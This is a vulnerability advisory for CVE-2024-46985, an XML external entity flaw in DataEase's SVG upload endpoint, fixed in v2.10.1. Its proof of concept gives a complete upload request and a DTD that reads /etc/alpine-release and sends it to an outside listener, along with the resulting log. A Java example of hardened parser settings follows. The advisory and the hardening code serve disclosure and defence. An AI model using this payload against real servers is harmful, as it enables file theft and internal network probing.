CVE-2024-46985 io.dataease:common

Package

Manager: maven
Name: io.dataease:common
Vulnerable Version: >=0 <2.10.1

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

EPSS: 0.00151 (percentile 0.36251)

Details

DataEase has an XML External Entity Reference vulnerability

### Impact

There is an XML external entity injection vulnerability in the static resource upload interface of DataEase. An attacker can construct a payload to implement intranet detection and file reading.

1. Send request:

```
POST /de2api/staticResource/upload/1 HTTP/1.1
Host: dataease.ubuntu20.vm
Content-Length: 348
Accept: application/json, text/plain, */*
out_auth_platform: default
X-DE-TOKEN: jwt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6OZBNygiUCAZEbMn

------WebKitFormBoundary6OZBNygiUCAZEbMn
Content-Disposition: form-data; name="file"; filename="1.svg"
Content-Type: a

<?xml version='1.0'?>
<!DOCTYPE xxe [
<!ENTITY % EvilDTD SYSTEM 'http://10.168.174.1:8000/1.dtd'>
%EvilDTD;
%LoadOOBEnt;
%OOB;
]>
------WebKitFormBoundary6OZBNygiUCAZEbMn--

// contents of 1.dtd
<!ENTITY % resource SYSTEM "file:///etc/alpine-release">
<!ENTITY % LoadOOBEnt "<!ENTITY &#x25; OOB SYSTEM 'http://10.168.174.1:8000/?content=%resource;'>">
```

2. After sending the request, the content of the file /etc/alpine-release is successfully read:

```
::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /1.dtd HTTP/1.1" 200 -
::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /?content=3.20.0 HTTP/1.1" 200 -
```

Affected versions: <= 2.10.0

### Patches

The vulnerability has been fixed in v2.10.1.

### Workarounds

It is recommended to upgrade the version to v2.10.1.

### References

If you have any questions or comments about this advisory:

- Open an issue in https://github.com/dataease/dataease
- Email us at [wei@fit2cloud.com](mailto:wei@fit2cloud.com)
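The root cause in CWE-611 advisories of this kind is an XML parser that resolves DOCTYPE declarations and external entities while handling an uploaded SVG. The following is an added example, not code from DataEase or its v2.10.1 patch: it shows the JAXP `DocumentBuilderFactory` hardening that a Java upload handler can apply so that a payload shaped like the one above is rejected before any entity is fetched. The `ATTACKER_HOST` placeholder and the `acceptsSvg` helper are constructed for illustration.

```java
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import java.io.IOException;
import java.io.StringReader;

public class SafeSvgUploadCheck {
    // Hardened parser: refuse any DOCTYPE, and as defence in depth also
    // disable external general/parameter entities and external DTD loading.
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        // JAXP 1.5 properties: empty string = no external DTD/schema access at all
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        return f.newDocumentBuilder();
    }

    // Hypothetical upload-side check: true only if the body parses under the
    // hardened configuration and its root element is <svg>.
    static boolean acceptsSvg(String xml) {
        try {
            Document d = hardenedBuilder().parse(new InputSource(new StringReader(xml)));
            return "svg".equals(d.getDocumentElement().getTagName());
        } catch (SAXException | IOException | ParserConfigurationException e) {
            // disallow-doctype-decl raises a SAXParseException on the DOCTYPE line,
            // so no network or file access happens for an entity-bearing upload
            return false;
        }
    }

    public static void main(String[] args) {
        // Constructed samples: the first mirrors the shape of the advisory's
        // payload with a placeholder host, the second is a plain SVG.
        String hostile = "<?xml version='1.0'?>\n"
            + "<!DOCTYPE xxe [ <!ENTITY % EvilDTD SYSTEM 'http://ATTACKER_HOST/1.dtd'> %EvilDTD; ]>\n"
            + "<svg/>";
        String benign = "<svg xmlns='http://www.w3.org/2000/svg' width='1' height='1'/>";
        System.out.println("hostile upload accepted: " + acceptsSvg(hostile));
        System.out.println("benign upload accepted: " + acceptsSvg(benign));
    }
}
```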

Metadata

Created: 2024-09-23T20:27:22Z
Modified: 2024-09-23T20:27:22Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-4m9p-7xg6-f4mm/GHSA-4m9p-7xg6-f4mm.json
CWE IDs: ["CWE-611"]
Alternative ID: GHSA-4m9p-7xg6-f4mm
Finding: F083
Auto approve: 1